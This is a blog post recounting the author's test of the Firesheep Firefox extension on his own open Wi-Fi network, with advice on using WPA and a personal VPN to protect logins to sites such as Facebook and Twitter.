Derek Schauland took the Firesheep extension for Firefox out for a spin, and discovered how easy it makes stealing credentials on open wireless networks. Here is his take on how to protect yourself.
Recently a new plug-in was released for Mozilla Firefox called Firesheep. This plug-in is used to capture the user name and password of unsuspecting users connecting to a rather wide array of websites, such as Facebook and Twitter, via open wireless networks.
The plug-in was created to drive home the point that websites need to take better responsibility for the data of their users and require secure logins that make use of end-to-end encryption.
Firesheep makes hacking really easy (and scary)Because trying out the technology is part of the fun of blogging, I decided to see what this plug-in was all about and installed it in Firefox. Then I thought I would test it out. Note: I used my own open wireless network and laptops for testing for this article. I did not compromise any user credentials in testing this plug-in.
After installing Fire Sheep, I connected to my Mi-Fi on that computer, and started looking for information.
Then I connected another laptop to the open network, and logged into Facebook. Almost faster than I was logged in, my credentials appeared in Firesheep. Then I logged into Twitter using the web client and the same thing happened there.
This being the first time I had used Fire Sheep, I was a bit surprised at how fast it gathered my information. WOW.
Not only does it capture credentials, logging in with the gathered information is as simple as a double-click.
What if I just stay off of open wireless networks?
This is a good idea in general, however, if someone on your own wireless network is running Firesheep and you log in to one of the affected websites, it will grab the credentials and display them in the side bar. The likelihood of anyone running the Firesheep plug in on a known trusted network, i.e., your workplace or home, is probably slim to none, however, it doesn't stop someone from trying.
Why anyone would be using either an open Wi-Fi network or a WEP-encrypted network in a business setting is a bit beyond me. The technology was good enough when it was the only technology available, but WPA runs circles around the older technology and is certainly better than an open network. Because access to information is just as crucial these days as access to the super-secret file cabinet in the HR manager's office, it is best to use the highest level of security offered to ensure the safety of your information, from employees and non-employees alike. The cost of access points today is relatively cheap (depending on what your needs are) and can get your wireless infrastructure up to the WPA standard with very little spend and configuration effort.
What about other browsers?
I tried Chrome, Internet Explorer and Firefox with Firesheep running and was able to capture the credentials for Facebook and Twitter.
What can I do to keep my information safe?
In a previous post, I covered a personal VPN service called WiTopia that encrypts your traffic from your PC all the way to WiTopia's servers. Requests for sites are then sent to the hosts and the response is encrypted back to you, virtually eliminating the problem.
Now that Fire Sheep is around, and I have seen how easy it is to get a hold of information for some sites, the $60 annual price tag for encrypted data on any connection via a personal VPN is worth the price of admission for me. Especially since you are allowed to install the application on any computers you own (as long as you only use them one at a time).Note: VPN Connections or other proxies connections that you may have access to will also encrypt your traffic and may be free or provided by your workplace.
Further research shows some Wi-Fi is okay
I tried several types of wireless networks to see which would allow Firesheep to gather information.
- Open - allows easy information capture
- WEP - allows information capture by other connected users
- WPA - does not allow information capture by Firesheep
I was quite surprised that WEP would still allow Firesheep to capture information and glad to know that attempts to collect information on WPA wireless networks did not work.
So what is the bottom line?
There have always been ways to get access to people's data via fairly simple hacking attempts, and especially on unsecured networks, but Firesheep makes it extremely easy for the masses. If you don't already have access to a VPN connection, services like WiTopia are a good way to help ensure your data is a bit more secure when using wireless networks, regardless of their security level.